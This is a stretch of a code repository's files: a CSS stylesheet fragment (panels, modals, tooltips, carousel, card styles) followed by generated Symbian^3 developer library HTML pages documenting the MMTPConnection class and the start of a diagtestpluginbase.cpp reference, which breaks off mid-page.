} .panel > .table-bordered, .panel > .table-responsive > .table-bordered { border: 0; } .panel > .table-bordered > thead > tr > th:first-child, .panel > .table-responsive > .table-bordered > thead > tr > th:first-child, .panel > .table-bordered > tbody > tr > th:first-child, .panel > .table-responsive > .table-bordered > tbody > tr > th:first-child, .panel > .table-bordered > tfoot > tr > th:first-child, .panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child, .panel > .table-bordered > thead > tr > td:first-child, .panel > .table-responsive > .table-bordered > thead > tr > td:first-child, .panel > .table-bordered > tbody > tr > td:first-child, .panel > .table-responsive > .table-bordered > tbody > tr > td:first-child, .panel > .table-bordered > tfoot > tr > td:first-child, .panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child { border-left: 0; } .panel > .table-bordered > thead > tr > th:last-child, .panel > .table-responsive > .table-bordered > thead > tr > th:last-child, .panel > .table-bordered > tbody > tr > th:last-child, .panel > .table-responsive > .table-bordered > tbody > tr > th:last-child, .panel > .table-bordered > tfoot > tr > th:last-child, .panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child, .panel > .table-bordered > thead > tr > td:last-child, .panel > .table-responsive > .table-bordered > thead > tr > td:last-child, .panel > .table-bordered > tbody > tr > td:last-child, .panel > .table-responsive > .table-bordered > tbody > tr > td:last-child, .panel > .table-bordered > tfoot > tr > td:last-child, .panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child { border-right: 0; } .panel > .table-bordered > thead > tr:first-child > td, .panel > .table-responsive > .table-bordered > thead > tr:first-child > td, .panel > .table-bordered > tbody > tr:first-child > td, .panel > .table-responsive > .table-bordered > tbody > tr:first-child > td, .panel > .table-bordered > thead > tr:first-child > th, .panel > .table-responsive > .table-bordered > thead > tr:first-child > th, .panel > .table-bordered > tbody > tr:first-child > th, .panel > .table-responsive > .table-bordered > tbody > tr:first-child > th { border-bottom: 0; } .panel > .table-bordered > tbody > tr:last-child > td, .panel > .table-responsive > .table-bordered > tbody > tr:last-child > td, .panel > .table-bordered > tfoot > tr:last-child > td, .panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td, .panel > .table-bordered > tbody > tr:last-child > th, .panel > .table-responsive > .table-bordered > tbody > tr:last-child > th, .panel > .table-bordered > tfoot > tr:last-child > th, .panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th { border-bottom: 0; } .panel > .table-responsive { border: 0; margin-bottom: 0; } .panel-group { margin-bottom: 20px; } .panel-group .panel { margin-bottom: 0; border-radius: 4px; overflow: hidden; } .panel-group .panel + .panel { margin-top: 5px; } .panel-group .panel-heading { border-bottom: 0; } .panel-group .panel-heading + .panel-collapse .panel-body { border-top: 1px solid #dddddd; } .panel-group .panel-footer { border-top: 0; } .panel-group .panel-footer + .panel-collapse .panel-body { border-bottom: 1px solid #dddddd; } .panel-default { border-color: #dddddd; } .panel-default > .panel-heading { color: #333333; background-color: #f5f5f5; border-color: #dddddd; } .panel-default > .panel-heading + .panel-collapse .panel-body { border-top-color: #dddddd; } .panel-default > .panel-footer + .panel-collapse .panel-body { border-bottom-color: #dddddd; } .panel-primary { border-color: #428bca; } .panel-primary > .panel-heading { color: #ffffff; background-color: #428bca; border-color: #428bca; } .panel-primary > .panel-heading + .panel-collapse .panel-body { border-top-color: #428bca; } .panel-primary > .panel-footer + .panel-collapse .panel-body { border-bottom-color: #428bca; } .panel-success { border-color: #d6e9c6; } .panel-success > .panel-heading { color: #3c763d; background-color: #dff0d8; border-color: #d6e9c6; } .panel-success > .panel-heading + .panel-collapse .panel-body { border-top-color: #d6e9c6; } .panel-success > .panel-footer + .panel-collapse .panel-body { border-bottom-color: #d6e9c6; } .panel-info { border-color: #bce8f1; } .panel-info > .panel-heading { color: #31708f; background-color: #d9edf7; border-color: #bce8f1; } .panel-info > .panel-heading + .panel-collapse .panel-body { border-top-color: #bce8f1; } .panel-info > .panel-footer + .panel-collapse .panel-body { border-bottom-color: #bce8f1; } .panel-warning { border-color: #faebcc; } .panel-warning > .panel-heading { color: #8a6d3b; background-color: #fcf8e3; border-color: #faebcc; } .panel-warning > .panel-heading + .panel-collapse .panel-body { border-top-color: #faebcc; } .panel-warning > .panel-footer + .panel-collapse .panel-body { border-bottom-color: #faebcc; } .panel-danger { border-color: #ebccd1; } .panel-danger > .panel-heading { color: #a94442; background-color: #f2dede; border-color: #ebccd1; } .panel-danger > .panel-heading + .panel-collapse .panel-body { border-top-color: #ebccd1; } .panel-danger > .panel-footer + .panel-collapse .panel-body { border-bottom-color: #ebccd1; } .well { min-height: 20px; padding: 19px; margin-bottom: 20px; background-color: #f5f5f5; border: 1px solid #e3e3e3; border-radius: 4px; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05); box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05); } .well blockquote { border-color: #ddd; border-color: rgba(0, 0, 0, 0.15); } .well-lg { padding: 24px; border-radius: 6px; } .well-sm { padding: 9px; border-radius: 3px; } .close { float: right; font-size: 21px; font-weight: bold; line-height: 1; color: #000000; text-shadow: 0 1px 0 #ffffff; opacity: 0.2; filter: alpha(opacity=20); } .close:hover, .close:focus { color: #000000; text-decoration: none; cursor: pointer; opacity: 0.5; filter: alpha(opacity=50); } button.close { padding: 0; cursor: pointer; background: transparent; border: 0; -webkit-appearance: none; } .modal-open { overflow: hidden; } .modal { display: none; overflow: auto; overflow-y: scroll; position: fixed; top: 0; right: 0; bottom: 0; left: 0; z-index: 1050; -webkit-overflow-scrolling: touch; outline: 0; } .modal.fade .modal-dialog { -webkit-transform: translate(0, -25%); -ms-transform: translate(0, -25%); transform: translate(0, -25%); -webkit-transition: -webkit-transform 0.3s ease-out; -moz-transition: -moz-transform 0.3s ease-out; -o-transition: -o-transform 0.3s ease-out; transition: transform 0.3s ease-out; } .modal.in .modal-dialog { -webkit-transform: translate(0, 0); -ms-transform: translate(0, 0); transform: translate(0, 0); } .modal-dialog { position: relative; width: auto; margin: 10px; } .modal-content { position: relative; background-color: #ffffff; border: 1px solid #999999; border: 1px solid rgba(0, 0, 0, 0.2); border-radius: 6px; -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5); box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5); background-clip: padding-box; outline: none; } .modal-backdrop { position: fixed; top: 0; right: 0; bottom: 0; left: 0; z-index: 1040; background-color: #000000; } .modal-backdrop.fade { opacity: 0; filter: alpha(opacity=0); } .modal-backdrop.in { opacity: 0.5; filter: alpha(opacity=50); } .modal-header { padding: 15px; border-bottom: 1px solid #e5e5e5; min-height: 16.42857143px; } .modal-header .close { margin-top: -2px; } .modal-title { margin: 0; line-height: 1.42857143; } .modal-body { position: relative; padding: 20px; } .modal-footer { margin-top: 15px; padding: 19px 20px 20px; text-align: right; border-top: 1px solid #e5e5e5; } .modal-footer .btn + .btn { margin-left: 5px; margin-bottom: 0; } .modal-footer .btn-group .btn + .btn { margin-left: -1px; } .modal-footer .btn-block + .btn-block { margin-left: 0; } @media (min-width: 768px) { .modal-dialog { width: 600px; margin: 30px auto; } .modal-content { -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5); box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5); } .modal-sm { width: 300px; } } @media (min-width: 992px) { .modal-lg { width: 900px; } } .tooltip { position: absolute; z-index: 1030; display: block; visibility: visible; font-size: 12px; line-height: 1.4; opacity: 0; filter: alpha(opacity=0); } .tooltip.in { opacity: 0.9; filter: alpha(opacity=90); } .tooltip.top { margin-top: -3px; padding: 5px 0; } .tooltip.right { margin-left: 3px; padding: 0 5px; } .tooltip.bottom { margin-top: 3px; padding: 5px 0; } .tooltip.left { margin-left: -3px; padding: 0 5px; } .tooltip-inner { max-width: 200px; padding: 3px 8px; color: #ffffff; text-align: center; text-decoration: none; background-color: #000000; border-radius: 4px; } .tooltip-arrow { position: absolute; width: 0; height: 0; border-color: transparent; border-style: solid; } .tooltip.top .tooltip-arrow { bottom: 0; left: 50%; margin-left: -5px; border-width: 5px 5px 0; border-top-color: #000000; } .tooltip.top-left .tooltip-arrow { bottom: 0; left: 5px; border-width: 5px 5px 0; border-top-color: #000000; } .tooltip.top-right .tooltip-arrow { bottom: 0; right: 5px; border-width: 5px 5px 0; border-top-color: #000000; } .tooltip.right .tooltip-arrow { top: 50%; left: 0; margin-top: -5px; border-width: 5px 5px 5px 0; border-right-color: #000000; } .tooltip.left .tooltip-arrow { top: 50%; right: 0; margin-top: -5px; border-width: 5px 0 5px 5px; border-left-color: #000000; } .tooltip.bottom .tooltip-arrow { top: 0; left: 50%; margin-left: -5px; border-width: 0 5px 5px; border-bottom-color: #000000; } .tooltip.bottom-left .tooltip-arrow { top: 0; left: 5px; border-width: 0 5px 5px; border-bottom-color: #000000; } .tooltip.bottom-right .tooltip-arrow { top: 0; right: 5px; border-width: 0 5px 5px; border-bottom-color: #000000; } .popover { position: absolute; top: 0; left: 0; z-index: 1010; display: none; max-width: 276px; padding: 1px; text-align: left; background-color: #ffffff; background-clip: padding-box; border: 1px solid #cccccc; border: 1px solid rgba(0, 0, 0, 0.2); border-radius: 6px; -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2); box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2); white-space: normal; } .popover.top { margin-top: -10px; } .popover.right { margin-left: 10px; } .popover.bottom { margin-top: 10px; } .popover.left { margin-left: -10px; } .popover-title { margin: 0; padding: 8px 14px; font-size: 14px; font-weight: normal; line-height: 18px; background-color: #f7f7f7; border-bottom: 1px solid #ebebeb; border-radius: 5px 5px 0 0; } .popover-content { padding: 9px 14px; } .popover > .arrow, .popover > .arrow:after { position: absolute; display: block; width: 0; height: 0; border-color: transparent; border-style: solid; } .popover > .arrow { border-width: 11px; } .popover > .arrow:after { border-width: 10px; content: ""; } .popover.top > .arrow { left: 50%; margin-left: -11px; border-bottom-width: 0; border-top-color: #999999; border-top-color: rgba(0, 0, 0, 0.25); bottom: -11px; } .popover.top > .arrow:after { content: " "; bottom: 1px; margin-left: -10px; border-bottom-width: 0; border-top-color: #ffffff; } .popover.right > .arrow { top: 50%; left: -11px; margin-top: -11px; border-left-width: 0; border-right-color: #999999; border-right-color: rgba(0, 0, 0, 0.25); } .popover.right > .arrow:after { content: " "; left: 1px; bottom: -10px; border-left-width: 0; border-right-color: #ffffff; } .popover.bottom > .arrow { left: 50%; margin-left: -11px; border-top-width: 0; border-bottom-color: #999999; border-bottom-color: rgba(0, 0, 0, 0.25); top: -11px; } .popover.bottom > .arrow:after { content: " "; top: 1px; margin-left: -10px; border-top-width: 0; border-bottom-color: #ffffff; } .popover.left > .arrow { top: 50%; right: -11px; margin-top: -11px; border-right-width: 0; border-left-color: #999999; border-left-color: rgba(0, 0, 0, 0.25); } .popover.left > .arrow:after { content: " "; right: 1px; border-right-width: 0; border-left-color: #ffffff; bottom: -10px; } .carousel { position: relative; } .carousel-inner { position: relative; overflow: hidden; width: 100%; } .carousel-inner > .item { display: none; position: relative; -webkit-transition: 0.6s ease-in-out left; transition: 0.6s ease-in-out left; } .carousel-inner > .item > img, .carousel-inner > .item > a > img { line-height: 1; } .carousel-inner > .active, .carousel-inner > .next, .carousel-inner > .prev { display: block; } .carousel-inner > .active { left: 0; } .carousel-inner > .next, .carousel-inner > .prev { position: absolute; top: 0; width: 100%; } .carousel-inner > .next { left: 100%; } .carousel-inner > .prev { left: -100%; } .carousel-inner > .next.left, .carousel-inner > .prev.right { left: 0; } .carousel-inner > .active.left { left: -100%; } .carousel-inner > .active.right { left: 100%; } .carousel-control { position: absolute; top: 0; left: 0; bottom: 0; width: 15%; opacity: 0.5; filter: alpha(opacity=50); font-size: 20px; color: #ffffff; text-align: center; text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6); } .carousel-control.left { background-image: -webkit-linear-gradient(left, color-stop(rgba(0, 0, 0, 0.5) 0%), color-stop(rgba(0, 0, 0, 0.0001) 100%)); background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1); } .carousel-control.right { left: auto; right: 0; background-image: -webkit-linear-gradient(left, color-stop(rgba(0, 0, 0, 0.0001) 0%), color-stop(rgba(0, 0, 0, 0.5) 100%)); background-image: linear-gradient(to right, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1); } .carousel-control:hover, .carousel-control:focus { outline: none; color: #ffffff; text-decoration: none; opacity: 0.9; filter: alpha(opacity=90); } .carousel-control .icon-prev, .carousel-control .icon-next, .carousel-control .glyphicon-chevron-left, .carousel-control .glyphicon-chevron-right { position: absolute; top: 50%; z-index: 5; display: inline-block; } .carousel-control .icon-prev, .carousel-control .glyphicon-chevron-left { left: 50%; } .carousel-control .icon-next, .carousel-control .glyphicon-chevron-right { right: 50%; } .carousel-control .icon-prev, .carousel-control .icon-next { width: 20px; height: 20px; margin-top: -10px; margin-left: -10px; font-family: serif; } .carousel-control .icon-prev:before { content: '\2039'; } .carousel-control .icon-next:before { content: '\203a'; } .carousel-indicators { position: absolute; bottom: 10px; left: 50%; z-index: 15; width: 60%; margin-left: -30%; padding-left: 0; list-style: none; text-align: center; } .carousel-indicators li { display: inline-block; width: 10px; height: 10px; margin: 1px; text-indent: -999px; border: 1px solid #ffffff; border-radius: 10px; cursor: pointer; background-color: #000 \9; background-color: rgba(0, 0, 0, 0); } .carousel-indicators .active { margin: 0; width: 12px; height: 12px; background-color: #ffffff; } .carousel-caption { position: absolute; left: 15%; right: 15%; bottom: 20px; z-index: 10; padding-top: 20px; padding-bottom: 20px; color: #ffffff; text-align: center; text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6); } .carousel-caption .btn { text-shadow: none; } @media screen and (min-width: 768px) { .carousel-control .glyphicon-chevron-left, .carousel-control .glyphicon-chevron-right, .carousel-control .icon-prev, .carousel-control .icon-next { width: 30px; height: 30px; margin-top: -15px; margin-left: -15px; font-size: 30px; } .carousel-caption { left: 20%; right: 20%; padding-bottom: 30px; } .carousel-indicators { bottom: 20px; } } .clearfix:before, .clearfix:after, .container:before, .container:after, .container-fluid:before, .container-fluid:after, .row:before, .row:after, .form-horizontal .form-group:before, .form-horizontal .form-group:after, .btn-toolbar:before, .btn-toolbar:after, .btn-group-vertical > .btn-group:before, .btn-group-vertical > .btn-group:after, .nav:before, .nav:after, .navbar:before, .navbar:after, .navbar-header:before, .navbar-header:after, .navbar-collapse:before, .navbar-collapse:after, .pager:before, .pager:after, .panel-body:before, .panel-body:after, .modal-footer:before, .modal-footer:after { content: " "; display: table; } .clearfix:after, .container:after, .container-fluid:after, .row:after, .form-horizontal .form-group:after, .btn-toolbar:after, .btn-group-vertical > .btn-group:after, .nav:after, .navbar:after, .navbar-header:after, .navbar-collapse:after, .pager:after, .panel-body:after, .modal-footer:after { clear: both; } .center-block { display: block; margin-left: auto; margin-right: auto; } .pull-right { float: right !important; } .pull-left { float: left !important; } .hide { display: none !important; } .show { display: block !important; } .invisible { visibility: hidden; } .text-hide { font: 0/0 a; color: transparent; text-shadow: none; background-color: transparent; border: 0; } .hidden { display: none !important; visibility: hidden !important; } .affix { position: fixed; } @-ms-viewport { width: device-width; } .visible-xs, .visible-sm, .visible-md, .visible-lg { display: none !important; } @media (max-width: 767px) { .visible-xs { display: block !important; } table.visible-xs { display: table; } tr.visible-xs { display: table-row !important; } th.visible-xs, td.visible-xs { display: table-cell !important; } } @media (min-width: 768px) and (max-width: 991px) { .visible-sm { display: block !important; } table.visible-sm { display: table; } tr.visible-sm { display: table-row !important; } th.visible-sm, td.visible-sm { display: table-cell !important; } } @media (min-width: 992px) and (max-width: 1199px) { .visible-md { display: block !important; } table.visible-md { display: table; } tr.visible-md { display: table-row !important; } th.visible-md, td.visible-md { display: table-cell !important; } } @media (min-width: 1200px) { .visible-lg { display: block !important; } table.visible-lg { display: table; } tr.visible-lg { display: table-row !important; } th.visible-lg, td.visible-lg { display: table-cell !important; } } @media (max-width: 767px) { .hidden-xs { display: none !important; } } @media (min-width: 768px) and (max-width: 991px) { .hidden-sm { display: none !important; } } @media (min-width: 992px) and (max-width: 1199px) { .hidden-md { display: none !important; } } @media (min-width: 1200px) { .hidden-lg { display: none !important; } } .visible-print { display: none !important; } @media print { .visible-print { display: block !important; } table.visible-print { display: table; } tr.visible-print { display: table-row !important; } th.visible-print, td.visible-print { display: table-cell !important; } } @media print { .hidden-print { display: none !important; } } .card { text-align: center; float: left; margin: 10px; color: white; background-color: #33CCFF; width: 75px; height: 100px; } .in-play h2 { font-size: 12px; color: #333333; margin-top: 0px; } .in-play .card { background-color: #33FFFF; color: black; } .my h2, .opponent h2 { font-size: 12px; color: #333333; margin-top: 0px; } .my div, .opponent div { margin-bottom: 10px; } .my .deck, .opponent .deck { background-color: #e2e2e2; padding: 20px; }
pdk/GUID-31C19FDD-10EE-38A5-B5A3-26B86F09EA6E.html
warlordh/fork_Symbian
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="copyright" content="(C) Copyright 2010"/> <meta name="DC.rights.owner" content="(C) Copyright 2010"/> <meta name="DC.Type" content="cxxClass"/> <meta name="DC.Title" content="MMTPConnection"/> <meta name="DC.Format" content="XHTML"/> <meta name="DC.Identifier" content="GUID-31C19FDD-10EE-38A5-B5A3-26B86F09EA6E"/> <title>MMTPConnection</title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api"/><link rel="stylesheet" type="text/css" href="cxxref.css"/></head> <body class="cxxref" id="GUID-31C19FDD-10EE-38A5-B5A3-26B86F09EA6E"><a name="GUID-31C19FDD-10EE-38A5-B5A3-26B86F09EA6E"><!-- --></a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()">Collapse all</a> <a id="index" href="index.html">Symbian^3 Product Developer Library</a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1">&#160;</div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2437088 id2437096 id2366708 id2391687 id2391846 id2391851 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"><a href="index.html" title="Symbian^3 Product Developer Library">Symbian^3 Product Developer Library</a> &gt;</div> <h1 class="topictitle1">MMTPConnection Class Reference</h1> <table class="signature"><tr><td>class MMTPConnection</td></tr></table><div class="section"><div> <p>Defines the MTP data provider framework MTP connection interface.</p> </div></div> <div class="section member-index"><table border="0" class="member-index"><thead><tr><th colspan="2">Public Member Functions</th></tr></thead><tbody><tr><td align="right" class="code"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint</a> </td><td><a href="#GUID-889A518A-490F-3187-8B31-0C9EA611FAE9">ConnectionId</a>()</td></tr><tr class="bg"><td align="right" class="code"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint</a> </td><td><a href="#GUID-EDDF53EC-A4F7-3199-9C0B-E4116C3EB317">SessionCount</a>()</td></tr><tr><td align="right" class="code"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TBool</a> </td><td><a href="#GUID-8FD3BC91-A102-3FC7-9180-02E95F8D1421">SessionWithMTPIdExists</a>(<a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint32</a>)</td></tr><tr class="bg"><td align="right" class="code"> <a href="GUID-15E2C9D9-9CA9-3C6D-BE9C-E6EDED5AACA8.html">MMTPSession</a> &amp;</td><td><a href="#GUID-F615D398-D55C-3012-88A1-20C9AA0AF9AD">SessionWithMTPIdL</a>(<a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint32</a>)</td></tr><tr><td align="right" class="code"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TBool</a> </td><td><a href="#GUID-19B7EA21-62F1-33E2-B02A-786929EBB0FC">SessionWithUniqueIdExists</a>(<a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint32</a>)</td></tr><tr class="bg"><td align="right" class="code"> <a href="GUID-15E2C9D9-9CA9-3C6D-BE9C-E6EDED5AACA8.html">MMTPSession</a> &amp;</td><td><a href="#GUID-E7C0D747-28CC-38E0-A638-6608C438A4EA">SessionWithUniqueIdL</a>(<a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint32</a>)</td></tr></tbody></table></div><h1 class="pageHeading topictitle1">Member Functions Documentation</h1><div class="nested1" id="GUID-889A518A-490F-3187-8B31-0C9EA611FAE9"><a name="GUID-889A518A-490F-3187-8B31-0C9EA611FAE9"><!-- --></a> <h2 class="topictitle2">ConnectionId()</h2> <table class="signature"><tr><td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint</a> </td><td>ConnectionId</td><td>(</td><td>)</td><td>const [pure virtual]</td></tr></table><div class="section"><div> <p>Provides the unique MTP data provider framework assigned identifier of the connection. </p> </div></div> </div> <div class="nested1" id="GUID-EDDF53EC-A4F7-3199-9C0B-E4116C3EB317"><a name="GUID-EDDF53EC-A4F7-3199-9C0B-E4116C3EB317"><!-- --></a> <h2 class="topictitle2">SessionCount()</h2> <table class="signature"><tr><td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint</a> </td><td>SessionCount</td><td>(</td><td>)</td><td>const [pure virtual]</td></tr></table><div class="section"><div> <p>Provides a count of the number of sessions currently active on the connection. </p> </div></div> </div> <div class="nested1" id="GUID-8FD3BC91-A102-3FC7-9180-02E95F8D1421"><a name="GUID-8FD3BC91-A102-3FC7-9180-02E95F8D1421"><!-- --></a> <h2 class="topictitle2">SessionWithMTPIdExists(TUint32)</h2> <table class="signature"><tr><td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TBool</a> </td><td>SessionWithMTPIdExists</td><td>(</td><td><a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint32</a></td><td>aMTPId</td><td>)</td><td>const [pure virtual]</td></tr></table><div class="section"><div> <p>Indicates if a session with the specified MTP connection assigned identifier is currently active on the connection. </p> </div></div> <div class="section parameters"><h3 class="sectiontitle">Parameters</h3><table border="0" class="parameters"><tr><td class="parameter"><a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint32</a> aMTPId</td><td>The MTP connection assigned identifier of the session. </td></tr></table></div> </div> <div class="nested1" id="GUID-F615D398-D55C-3012-88A1-20C9AA0AF9AD"><a name="GUID-F615D398-D55C-3012-88A1-20C9AA0AF9AD"><!-- --></a> <h2 class="topictitle2">SessionWithMTPIdL(TUint32)</h2> <table class="signature"><tr><td> <a href="GUID-15E2C9D9-9CA9-3C6D-BE9C-E6EDED5AACA8.html">MMTPSession</a> &amp;</td><td>SessionWithMTPIdL</td><td>(</td><td><a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint32</a></td><td>aMTPId</td><td>)</td><td>const [pure virtual]</td></tr></table><div class="section"><div> <div class="p">Provides a reference to the session with the specified MTP connection assigned identifier. <dl class="user"><dt class="dlterm"><strong>leave</strong></dt> <dd>KErrNotFound, if the specified session identifier is not currently active on the connection. </dd> </dl> <a href="GUID-31C19FDD-10EE-38A5-B5A3-26B86F09EA6E.html#GUID-8FD3BC91-A102-3FC7-9180-02E95F8D1421">SessionWithMTPIdExists</a> </div> </div></div> <div class="section parameters"><h3 class="sectiontitle">Parameters</h3><table border="0" class="parameters"><tr><td class="parameter"><a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint32</a> aMTPId</td><td>The MTP connection assigned identifier of the requested session. </td></tr></table></div> </div> <div class="nested1" id="GUID-19B7EA21-62F1-33E2-B02A-786929EBB0FC"><a name="GUID-19B7EA21-62F1-33E2-B02A-786929EBB0FC"><!-- --></a> <h2 class="topictitle2">SessionWithUniqueIdExists(TUint32)</h2> <table class="signature"><tr><td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TBool</a> </td><td>SessionWithUniqueIdExists</td><td>(</td><td><a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint32</a></td><td>aUniqueId</td><td>)</td><td>const [pure virtual]</td></tr></table><div class="section"><div> <p>Indicates if a session with the specified MTP connection assigned identifier is currently active on the connection. </p> </div></div> <div class="section parameters"><h3 class="sectiontitle">Parameters</h3><table border="0" class="parameters"><tr><td class="parameter"><a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint32</a> aUniqueId</td><td>The MTP connection assigned identifier of the session. </td></tr></table></div> </div> <div class="nested1" id="GUID-E7C0D747-28CC-38E0-A638-6608C438A4EA"><a name="GUID-E7C0D747-28CC-38E0-A638-6608C438A4EA"><!-- --></a> <h2 class="topictitle2">SessionWithUniqueIdL(TUint32)</h2> <table class="signature"><tr><td> <a href="GUID-15E2C9D9-9CA9-3C6D-BE9C-E6EDED5AACA8.html">MMTPSession</a> &amp;</td><td>SessionWithUniqueIdL</td><td>(</td><td><a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint32</a></td><td>aUniqueId</td><td>)</td><td>const [pure virtual]</td></tr></table><div class="section"><div> <div class="p">Provides a reference to the session with the specified MTP connection assigned identifier. <dl class="user"><dt class="dlterm"><strong>leave</strong></dt> <dd>KErrNotFound, if the specified session identifier is not currently active on the connection. </dd> </dl> <a href="GUID-31C19FDD-10EE-38A5-B5A3-26B86F09EA6E.html#GUID-8FD3BC91-A102-3FC7-9180-02E95F8D1421">SessionWithMTPIdExists</a> </div> </div></div> <div class="section parameters"><h3 class="sectiontitle">Parameters</h3><table border="0" class="parameters"><tr><td class="parameter"><a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint32</a> aUniqueId</td><td>The MTP connection assigned identifier of the requested session. </td></tr></table></div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
sdk/GUID-16BC8677-B1FD-31C3-8350-2C0822A453A3.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxFile" /> <meta name="DC.Title" content="diagtestpluginbase.cpp" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-16BC8677-B1FD-31C3-8350-2C0822A453A3" /> <title> diagtestpluginbase.cpp </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-16BC8677-B1FD-31C3-8350-2C0822A453A3"> <a name="GUID-16BC8677-B1FD-31C3-8350-2C0822A453A3"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> diagtestpluginbase.cpp File Reference </h1> <div class="nested1" id="GUID-60E1B089-5A94-31AD-89E5-C21B43D98C74"> <a name="GUID-60E1B089-5A94-31AD-89E5-C21B43D98C74"> <!-- --> </a> <h2 class="topictitle2"> const CDiagResultsDatabaseItem::TResult KResultPriority </h2> <table class="signature"> <tr> <td> const <a href="GUID-6E0A5775-05AD-3BDA-ACF4-EED03E656A7F.html"> CDiagResultsDatabaseItem::TResult </a> </td> <td> KResultPriority </td> <td> [static] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-735DFA8B-90A4-3C1E-A56B-F200E724AA65"> <a name="GUID-735DFA8B-90A4-3C1E-A56B-F200E724AA65"> <!-- --> </a> <h2 